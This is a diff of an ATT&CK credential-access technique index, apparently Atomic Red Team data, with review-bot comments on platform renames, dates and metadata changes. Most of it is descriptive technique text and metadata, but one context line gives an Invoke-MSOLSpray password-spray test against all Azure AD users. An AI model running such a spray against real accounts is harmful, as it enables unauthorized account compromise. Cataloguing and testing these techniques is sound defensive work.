@@ -46748,12 +47513,11 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1003.001
atomic_tests: []
T1110.003:
technique:
- modified: '2024-03-07T14:33:34.201Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Brute Force: Password Spraying'
description: |-
Adversaries may use a single or small list of commonly used passwords against many different accounts to attempt to acquire valid account credentials. Password spraying uses one password (e.g. 'Password01'), or a small list of commonly used passwords, that may match the complexity policy of the domain. Logins are attempted with that password against many different accounts on a network to avoid account lockouts that would normally occur when brute forcing a single account with many passwords. (Citation: BlackHillsInfosec Password Spraying)
@@ -46779,6 +47543,7 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Microsoft Threat Intelligence Center (MSTIC)
- John Strand
@@ -46794,18 +47559,18 @@ credential-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- Network
- x_mitre_version: '1.5'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.6'
x_mitre_data_sources:
- 'User Account: User Account Authentication'
- 'Application Log: Application Log Content'
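Review bot: the platform list for T1110.003 drops 'Azure AD', 'Office 365' and 'Google Workspace' and adds 'Office Suite' and 'Identity Provider'. Any index, filter or test selector keyed on the old platform strings will silently match nothing after this change, so the platform-specific index generators and any documentation that lists supported platforms need the same rename in the same PR. The move of x_mitre_modified_by_ref from the end of the object to just before x_mitre_platforms is a key-order change only, but it is what inflates most hunks in this diff well beyond the actual data change; if the generator's key ordering is configurable, keeping the old order would make future diffs reviewable.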
@@ -46832,9 +47597,6 @@ credential-access:
url: https://www.us-cert.gov/ncas/alerts/TA18-086A
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1110.003
atomic_tests:
- name: Password spray all Azure AD users with a single password
@@ -46935,7 +47697,7 @@ credential-access:
Invoke-MSOLSpray -UserList "#{user_list}" -Password "#{password}"
T1056.003:
technique:
- modified: '2023-03-30T21:01:46.711Z'
+ modified: '2024-10-15T16:43:43.849Z'
name: Web Portal Capture
description: |-
Adversaries may install code on externally facing portals, such as a VPN login page, to capture and transmit credentials of users who attempt to log into the service. For example, a compromised login page may log provided user credentials before logging the user in to the service.
@@ -46946,13 +47708,13 @@ credential-access:
phase_name: collection
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_deprecated: false
x_mitre_detection: File monitoring may be used to detect changes to files in
the Web directory for organization login pages that do not match with authorized
updates to the Web server's content.
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Linux
- macOS
@@ -46966,6 +47728,7 @@ credential-access:
id: attack-pattern--69e5226d-05dc-4f15-95d7-44f5ed78d06e
created: '2020-02-11T18:59:50.058Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1056/003
@@ -46976,12 +47739,12 @@ credential-access:
url: https://www.volexity.com/blog/2015/10/07/virtual-private-keylogging-cisco-web-vpns-leveraged-for-access-and-persistence/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1003.005:
technique:
- modified: '2024-04-18T23:47:54.553Z'
+ modified: '2024-10-15T14:18:59.123Z'
name: 'OS Credential Dumping: Cached Domain Credentials'
description: "Adversaries may attempt to access cached domain credentials used
to allow authentication to occur in the event a domain controller is unavailable.(Citation:
@@ -47056,7 +47819,6 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1003.005
atomic_tests: []
T1558.001:
@@ -47102,7 +47864,7 @@ credential-access:
url: https://gallery.technet.microsoft.com/scriptcenter/Kerberos-Golden-Ticket-b4814285
description: Microsoft. (2015, March 24). Kerberos Golden Ticket Check (Updated).
Retrieved February 27, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2020-11-05T16:07:03.779Z'
name: 'Steal or Forge Kerberos Tickets: Golden Ticket'
description: "Adversaries who have the KRBTGT account password hash may forge
Kerberos ticket-granting tickets (TGT), also known as a golden ticket.(Citation:
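Review bot: the T1558.001 modified date goes from '2022-04-25T14:00:00.188Z' back to '2020-11-05T16:07:03.779Z', roughly a year and a half earlier. This is the same backwards pattern as T1557.001; if the new value is the object-level timestamp from the upstream bundle it is correct, but say so in the commit message, because a reader of this diff would otherwise assume the wrong source bundle was used.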
@@ -47137,16 +47899,14 @@ credential-access:
- 'Logon Session: Logon Session Metadata'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1558.001
atomic_tests: []
T1649:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Steal or Forge Authentication Certificates
description: |-
- Adversaries may steal or forge certificates used for authentication to access remote systems or resources. Digital certificates are often used to sign and encrypt messages and/or files. Certificates are also used as authentication material. For example, Azure AD device certificates and Active Directory Certificate Services (AD CS) certificates bind to an identity and can be used as credentials for domain accounts.(Citation: O365 Blog Azure AD Device IDs)(Citation: Microsoft AD CS Overview)
+ Adversaries may steal or forge certificates used for authentication to access remote systems or resources. Digital certificates are often used to sign and encrypt messages and/or files. Certificates are also used as authentication material. For example, Entra ID device certificates and Active Directory Certificate Services (AD CS) certificates bind to an identity and can be used as credentials for domain accounts.(Citation: O365 Blog Azure AD Device IDs)(Citation: Microsoft AD CS Overview)
Authentication certificates can be both stolen and forged. For example, AD CS certificates can be stolen from encrypted storage (in the Registry or files)(Citation: APT29 Deep Look at Credential Roaming), misplaced certificate files (i.e. [Unsecured Credentials](https://attack.mitre.org/techniques/T1552)), or directly from the Windows certificate store via various crypto APIs.(Citation: SpecterOps Certified Pre Owned)(Citation: GitHub CertStealer)(Citation: GitHub GhostPack Certificates) With appropriate enrollment rights, users and/or machines within a domain can also request and/or manually renew certificates from enterprise certificate authorities (CA). This enrollment process defines various settings and permissions associated with the certificate. Of note, the certificate’s extended key usage (EKU) values define signing, encryption, and authentication use cases, while the certificate’s subject alternative name (SAN) values define the certificate owner’s alternate names.(Citation: Medium Certified Pre Owned)
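Review bot: for T1558.001 both spec_version: '2.1' and x_mitre_attack_spec_version: 2.1.0 are deleted, and nothing in the visible hunks re-adds an x_mitre_attack_spec_version for this object, unlike the other techniques in this diff where it is re-emitted as 3.2.0 near the kill_chain_phases or object_marking_refs block. Check whether the T1558.001 object now lacks the field entirely (a consumer that reads it for every technique would hit a missing key) or whether it is re-added in a hunk outside this diff context. The T1649 description change from Azure AD to Entra ID is text only; the citation key 'O365 Blog Azure AD Device IDs' is unchanged, which is correct since it is an identifier, not prose.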
@@ -47156,21 +47916,23 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_contributors:
+ - Tristan Bennett, Seamless Intelligence
+ - Lee Christensen, SpecterOps
+ - Thirumalai Natarajan, Mandiant
+ x_mitre_deprecated: false
x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- Linux
- macOS
- - Azure AD
- x_mitre_is_subtechnique: false
- x_mitre_deprecated: false
- x_mitre_domains:
- - enterprise-attack
- x_mitre_version: '1.1'
- x_mitre_contributors:
- - Tristan Bennett, Seamless Intelligence
- - Lee Christensen, SpecterOps
- - Thirumalai Natarajan, Mandiant
+ - Identity Provider
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Application Log: Application Log Content'
@@ -47219,33 +47981,11 @@ credential-access:
url: https://www.mandiant.com/resources/blog/apt29-windows-credential-roaming
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1649
atomic_tests: []
T1552.003:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--8187bd2a-866f-4457-9009-86b0ddedffa3
- type: attack-pattern
- created: '2020-02-04T13:02:11.685Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1552.003
- url: https://attack.mitre.org/techniques/T1552/003
- - url: http://www.slideshare.net/StephanBorosh/external-to-da-the-os-x-way
- description: Alex Rymdeko-Harvey, Steve Borosh. (2016, May 14). External to
- DA, the OS X Way. Retrieved July 3, 2017.
- source_name: External to DA, the OS X Way
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-09-12T15:24:04.912Z'
name: 'Unsecured Credentials: Bash History'
description: 'Adversaries may search the bash command history on compromised
systems for insecurely stored credentials. Bash keeps track of the commands
@@ -47260,25 +48000,43 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_deprecated: false
x_mitre_detection: Monitoring when the user's .bash_history
is
read can help alert to suspicious activity. While users do typically rely
on their history of commands, they often access this history through other
utilities like "history" instead of commands like cat ~/.bash_history
.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'File: File Access'
- 'Command: Command Execution'
- x_mitre_permissions_required:
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--8187bd2a-866f-4457-9009-86b0ddedffa3
+ created: '2020-02-04T13:02:11.685Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1552/003
+ external_id: T1552.003
+ - source_name: External to DA, the OS X Way
+ description: Alex Rymdeko-Harvey, Steve Borosh. (2016, May 14). External to
+ DA, the OS X Way. Retrieved September 12, 2024.
+ url: https://www.slideshare.net/slideshow/external-to-da-the-os-x-way/62021418
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1552.003
atomic_tests: []
T1552.001:
technique:
- modified: '2024-04-15T21:33:00.213Z'
+ modified: '2024-10-15T14:28:43.639Z'
name: 'Unsecured Credentials: Credentials In Files'
description: |-
Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.
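Review bot: this hunk drops x_mitre_permissions_required: ['User'] from T1552.003 (the same removal appears for T1552.006 later in the diff) and re-emits the external_references block with a new slideshare URL and a retrieval date of September 12, 2024. Any consumer that reads x_mitre_permissions_required must now tolerate its absence, so grep the index and documentation generators for that key before merging. Separately, the x_mitre_detection text on the unchanged context lines ("Monitoring when the user's .bash_history" / "is" / "read can help ...") is still wrapped mid-sentence from an earlier serialization; since this object is being regenerated anyway, it is worth checking whether the generator can emit that string as a single scalar.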
@@ -47352,7 +48110,6 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1552.001
atomic_tests: []
T1606.001:
@@ -47414,11 +48171,10 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1528:
technique:
- modified: '2024-03-24T19:41:54.832Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Steal Application Access Token
description: "Adversaries can steal application access tokens as a means of
acquiring credentials to access remote systems and resources.\n\nApplication
@@ -47467,6 +48223,7 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Suzy Schapperle - Microsoft Azure Red Team
- Shailesh Tiwary (Indian Army)
@@ -47475,6 +48232,7 @@ credential-access:
- Saisha Agrawal, Microsoft Threat Intelligent Center (MSTIC)
- Ram Pliskin, Microsoft Azure Security Center
- Jack Burns, HubSpot
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: |-
Administrators should set up monitoring to trigger automatic alerts when policy criteria are met. For example, using a Cloud Access Security Broker (CASB), admins can create a “High severity app permissions” policy that generates alerts if apps request high severity permissions or send permissions requests for too many users.
@@ -47485,13 +48243,14 @@ credential-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- SaaS
- - Office 365
- - Azure AD
- - Google Workspace
- Containers
- x_mitre_version: '1.3'
+ - IaaS
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Active Directory: Active Directory Object Modification'
- 'User Account: User Account Modification'
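Review bot: for T1528 this is not a pure platform rename. Besides replacing 'Office 365', 'Azure AD' and 'Google Workspace' with 'Office Suite' and 'Identity Provider', the list gains 'IaaS', which was not present before. That is a substantive scope change for the technique, and any IaaS-filtered index will now include T1528, so confirm it comes from the upstream bundle and call it out in the commit message rather than letting it hide among the rename hunks.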
@@ -47547,44 +48306,11 @@ credential-access:
url: https://docs.microsoft.com/en-us/azure/active-directory/develop/active-directory-v2-protocols
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1528
atomic_tests: []
T1552.006:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--8d7bd4f5-3a89-4453-9c82-2c8894d5655e
- type: attack-pattern
- created: '2020-02-11T18:43:06.253Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1552.006
- url: https://attack.mitre.org/techniques/T1552/006
- - source_name: Microsoft GPP 2016
- url: https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/dn581922(v%3Dws.11)
- description: Microsoft. (2016, August 31). Group Policy Preferences. Retrieved
- March 9, 2020.
- - url: https://msdn.microsoft.com/library/cc422924.aspx
- description: Microsoft. (n.d.). 2.2.1.1.4 Password Encryption. Retrieved April
- 11, 2018.
- source_name: Microsoft GPP Key
- - url: https://obscuresecurity.blogspot.co.uk/2012/05/gpp-password-retrieval-with-powershell.html
- description: Campbell, C. (2012, May 24). GPP Password Retrieval with PowerShell.
- Retrieved April 11, 2018.
- source_name: Obscuresecurity Get-GPPPassword
- - description: Sean Metcalf. (2015, December 28). Finding Passwords in SYSVOL
- & Exploiting Group Policy Preferences. Retrieved February 17, 2020.
- url: https://adsecurity.org/?p=2288
- source_name: ADSecurity Finding Passwords in SYSVOL
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2024-08-15T13:21:22.734Z'
name: 'Unsecured Credentials: Group Policy Preferences'
description: |
Adversaries may attempt to find unsecured credentials in Group Policy Preferences (GPP). GPP are tools that allow administrators to create domain policies with embedded credentials. These policies allow administrators to set local accounts.(Citation: Microsoft GPP 2016)
@@ -47601,25 +48327,54 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_deprecated: false
x_mitre_detection: "Monitor for attempts to access SYSVOL that involve searching
for XML files. \n\nDeploy a new XML file with permissions set to Everyone:Deny
and monitor for Access Denied errors.(Citation: ADSecurity Finding Passwords
in SYSVOL)"
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'File: File Access'
- 'Command: Command Execution'
- x_mitre_permissions_required:
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--8d7bd4f5-3a89-4453-9c82-2c8894d5655e
+ created: '2020-02-11T18:43:06.253Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1552/006
+ external_id: T1552.006
+ - source_name: Obscuresecurity Get-GPPPassword
+ description: Campbell, C. (2012, May 24). GPP Password Retrieval with PowerShell.
+ Retrieved April 11, 2018.
+ url: https://obscuresecurity.blogspot.co.uk/2012/05/gpp-password-retrieval-with-powershell.html
+ - source_name: Microsoft GPP 2016
+ description: Microsoft. (2016, August 31). Group Policy Preferences. Retrieved
+ March 9, 2020.
+ url: https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/dn581922(v%3Dws.11)
+ - source_name: Microsoft GPP Key
+ description: Microsoft. (n.d.). 2.2.1.1.4 Password Encryption. Retrieved April
+ 11, 2018.
+ url: https://msdn.microsoft.com/library/cc422924.aspx
+ - source_name: ADSecurity Finding Passwords in SYSVOL
+ description: Sean Metcalf. (2015, December 28). Finding Passwords in SYSVOL
+ & Exploiting Group Policy Preferences. Retrieved February 17, 2020.
+ url: https://adsecurity.org/?p=2288
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1552.006
atomic_tests: []
T1556.008:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2023-05-04T18:02:51.318Z'
name: Network Provider DLL
description: "Adversaries may register malicious network provider dynamic link
libraries (DLLs) to capture cleartext user credentials during the authentication
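Review bot: the T1556.008 modified date moves backwards again, from '2023-10-31T14:00:00.188Z' to '2023-05-04T18:02:51.318Z', the same pattern already noted for T1557.001 and T1558.001, and it should be covered by the same explanation. Within the T1552.006 block, x_mitre_permissions_required: ['User'] is dropped and the four external_references are re-emitted in a different order (Obscuresecurity Get-GPPPassword now precedes Microsoft GPP 2016, previously the reverse); the entries themselves are unchanged, so this is reordering only, but combined with the key reordering it makes the hunk read as a rewrite of the whole object. If the generator sorts references, note the sort key so reviewers can tell reorders from content edits.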
@@ -47694,11 +48449,10 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1606:
technique:
- modified: '2023-10-15T11:10:03.428Z'
+ modified: '2024-10-15T15:58:23.638Z'
name: Forge Web Credentials
description: "Adversaries may forge credential materials that can be used to
gain access to web applications or Internet services. Web applications and
@@ -47742,11 +48496,10 @@ credential-access:
- Windows
- macOS
- Linux
- - Azure AD
- - Office 365
- - Google Workspace
- IaaS
- x_mitre_version: '1.4'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.5'
x_mitre_data_sources:
- 'Web Credential: Web Credential Usage'
- 'Web Credential: Web Credential Creation'
@@ -47770,8 +48523,8 @@ credential-access:
url: https://unit42.paloaltonetworks.com/mac-malware-steals-cryptocurrency-exchanges-cookies/
- source_name: GitHub AWS-ADFS-Credential-Generator
description: Damian Hickey. (2017, January 28). AWS-ADFS-Credential-Generator.
- Retrieved December 16, 2020.
- url: https://github.com/damianh/aws-adfs-credential-generator
+ Retrieved September 27, 2024.
+ url: https://github.com/pvanbuijtene/aws-adfs-credential-generator
- source_name: Microsoft SolarWinds Customer Guidance
description: MSRC. (2020, December 13). Customer Guidance on Recent Nation-State
Cyber Attacks. Retrieved December 17, 2020.
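Review bot: the GitHub AWS-ADFS-Credential-Generator reference now points at github.com/pvanbuijtene/aws-adfs-credential-generator instead of github.com/damianh/aws-adfs-credential-generator, while the description still credits Damian Hickey (2017). If the new URL is a fork or mirror rather than the author's relocated repository, the description should say so, and the new retrieval date of September 27, 2024 should be understood as referring to the new location. Pinning to a commit or to a web.archive.org snapshot, as was done for the Kaspersky Careto reference above, would avoid the next round of link rot.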
@@ -47787,11 +48540,10 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1621:
technique:
- modified: '2024-04-19T04:26:29.365Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Multi-Factor Authentication Request Generation
description: |-
Adversaries may attempt to bypass multi-factor authentication (MFA) mechanisms and gain access to accounts by generating MFA requests sent to users.
@@ -47802,11 +48554,13 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Jon Sternstein, Stern Security
- Pawel Partyka, Microsoft 365 Defender
- Shanief Webb
- Obsidian Security
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: 'Monitor user account logs as well as 2FA/MFA application
logs for suspicious events: unusual login attempt source location, mismatch
@@ -47816,16 +48570,16 @@ credential-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Office 365
- Linux
- macOS
- IaaS
- SaaS
- - Azure AD
- - Google Workspace
- x_mitre_version: '1.1'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'User Account: User Account Authentication'
- 'Logon Session: Logon Session Metadata'
@@ -47863,13 +48617,10 @@ credential-access:
url: https://www.obsidiansecurity.com/blog/behind-the-breach-self-service-password-reset-azure-ad/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1552.008:
technique:
- modified: '2023-04-11T00:34:00.779Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Chat Messages
description: |-
Adversaries may directly collect unsecured credentials stored or passed through user communication services. Credentials may be sent and stored in user chat communication applications such as email, chat services like Slack or Teams, collaboration tools like Jira or Trello, and any other services that support user communication. Users may share various forms of credentials (such as usernames and passwords, API keys, or authentication tokens) on private or public corporate internal communications channels.
@@ -47878,6 +48629,7 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Douglas Weir
x_mitre_deprecated: false
@@ -47885,11 +48637,11 @@ credential-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- - Office 365
- SaaS
- - Google Workspace
- x_mitre_version: '1.0'
+ - Office Suite
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
type: attack-pattern
@@ -47907,13 +48659,10 @@ credential-access:
url: https://www.nightfall.ai/blog/saas-slack-security-risks-2020
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1212:
technique:
- modified: '2023-10-15T11:45:21.555Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Exploitation for Credential Access
description: |-
Adversaries may exploit software vulnerabilities in an attempt to collect credentials. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code.
@@ -47926,6 +48675,7 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- John Lambert, Microsoft Threat Intelligence Center
- Mohit Rathore
@@ -47939,12 +48689,13 @@ credential-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Linux
- Windows
- macOS
- - Azure AD
- x_mitre_version: '1.5'
+ - Identity Provider
+ x_mitre_version: '1.6'
x_mitre_data_sources:
- 'User Account: User Account Authentication'
- 'Process: Process Creation'
@@ -47976,17 +48727,14 @@ credential-access:
url: https://www.microsoft.com/en-us/security/blog/2023/07/14/analysis-of-storm-0558-techniques-for-unauthorized-email-access/
- source_name: Microsoft Midnight Blizzard Replay Attack
description: Microsoft Threat Intelligence. (2023, June 21). Credential Attacks.
- Retrieved September 27, 2023.
- url: https://twitter.com/MsftSecIntel/status/1671579359994343425
+ Retrieved September 12, 2024.
+ url: https://x.com/MsftSecIntel/status/1671579359994343425
- source_name: Technet MS14-068
description: Microsoft. (2014, November 18). Vulnerability in Kerberos Could
Allow Elevation of Privilege (3011780). Retrieved December 23, 2015.
url: https://technet.microsoft.com/en-us/library/security/ms14-068.aspx
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1056.002:
technique:
@@ -48059,12 +48807,11 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1056.002
atomic_tests: []
T1110:
technique:
- modified: '2024-01-29T18:53:26.593Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Brute Force
description: |-
Adversaries may use brute force techniques to gain access to accounts when passwords are unknown or when password hashes are obtained.(Citation: TrendMicro Pawn Storm Dec 2020) Without knowledge of the password for an account or set of accounts, an adversary may systematically guess the password using a repetitive or iterative mechanism.(Citation: Dragos Crashoverride 2018) Brute forcing passwords can take place via interaction with a service that will check the validity of those credentials or offline against previously acquired credential data, such as password hashes.
@@ -48073,6 +48820,7 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- David Fiser, @anu4is, Trend Micro
- Alfredo Oliveira, Trend Micro
@@ -48091,18 +48839,18 @@ credential-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- Network
- x_mitre_version: '2.5'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.6'
x_mitre_data_sources:
- 'User Account: User Account Authentication'
- 'Command: Command Execution'
@@ -48126,13 +48874,10 @@ credential-access:
url: https://www.dragos.com/wp-content/uploads/CRASHOVERRIDE2018.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1110.004:
technique:
- modified: '2024-03-07T14:28:02.910Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Brute Force: Credential Stuffing'
description: |-
